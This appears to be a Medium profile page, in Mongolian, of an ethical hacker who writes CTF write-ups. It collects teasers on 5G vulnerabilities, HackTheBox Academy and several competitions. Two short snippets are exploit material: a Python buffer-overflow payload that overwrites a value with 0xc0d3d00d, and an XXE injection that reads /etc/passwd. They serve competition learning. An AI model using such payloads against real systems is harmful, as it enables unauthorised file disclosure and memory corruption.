Sign in

👋 5G сүлжээний аюулгүй байдал 📡📡📡
Аюулгүй байдлын судлаачид 5G сүлжээний виртуалчлах технологийн баталгаажуулалт дээр ноцтой эмзэг байдлыг илрүүлжээ. Энэхүү эмзэг байдлыг ашигласнаар тухайн холбогдсон хэрэглэгчдийн
Мэдээллийг хулгайлах ,
Байршлыг мэдэж авах ,
Их хэмжээний хүсэлтэд сервер доголдох
зэрэг эрсдэлийг бий болгох юм.

📡 5G сүлжээний эмзэг байдал
🔊 Adaptive Mobile Security компани 5G сүлжээний OAuth дээр 3 шинэ эмзэг байдал гарсан гэх мэдээлэл нийтэлжээ.
🔊 5G нь “Network Slicing” технологийг ашигладаг бөгөөд энэ нь сүлжээгээр их хэмжээний мэдээлэл буюу ( хүмүүсийн яриа , мессэж , стрийм болон интернет орчинд ашиглаж байгаа бусад мэдээллүүд ) -г ямар ч…


Аливаа зүйл харагдаж байгаа шигээ амархан байдаггүй…

Сайн байцгаана уу. Намайг Түмэнхүүгийн Ялгуун гэдэг. Найзууд маань Эфгоод (fg0d ) гэж дууддаг. Одоо 22 настай | Ёс зүйт хакер |.


HackTheBox бол дэлхийн хамгийн том , хакеруудын өрсөлдөөний платформ билээ. Миний бие энэхүү платформоор дамжуулж идэвхтэй мэдлэгээ ахиулаад 1 жил өнгөрсөн байна. Энэхүү нийтлэлээр та бүхэнд HackTheBox -н саяхан шинээр гаргасан боломжыг хэрхэн ашиглах талаар мэдээллийг хүргэнэ.

  1. Academy ( Академи )


Pwn CheckSec

ebp-0xc in debugger

import struct

print 'A'*15
print 'A'*15
print 'A'*15
print 'A'*116 + struct.pack('<I', 0xc0d3d00d)


TokyoWesterns CTF 5th 2019 [ WEB , Forensics , Misc ]

WEB

j2x2j WEB 59 онооны даалгавар [ This challenge has 59 points ]

Уг даалгавар нь JSON → XML , XML → JSON converter байсан бөгөөд үүнийг харахад миний зүгээс XML → JSON хэсгийг ашиглаж XXE буюу [ XML Externel Entity ] exploit -г хийх боломжтой байсан. Үүнийг туршиж үзэхийн тулд эхлээд энгийн injection -г хийж туршиж үзсэн.

Injection:

<?xml version=”1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM ‘file:///etc/passwd’>]><root>&test;</root>


[ Forensics ] Slow Realization ( 200 points )

Энэхүү Writeup нь зөвхөн анхлан суралцагчдад зориулагдсан бөгөөд цаашид CTF -н даалгавруудын зөвлөмжүүдийг идэвхтэй хүргэх болно. [FantasM ]

Райны найз энэ зурган дээр ямар нэгэн зүйлийг нуугаад , түүнийг олж илрүүлэхийг уриалав. Та нууц мэдээг сэргээхэд нь түүнд тусалж чадах уу?


[ 944 points]

Харуул Занги 2018 тэмцээний эцсийн шатны Web exploitation төрлийн эхний даалгавар болох “Shao Kahn” даалгаврын writeup — ыг хүргэж байна.


forensics , stegano

Hackover CTF 2018 challenge type of forensics “I AM MANY”.

Fgod

fσundєr & cєσ @fαntαsm — pєnєtrαtíσn tєstєr & sєcurítч rєsєαrchєr & lєαrnєr

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store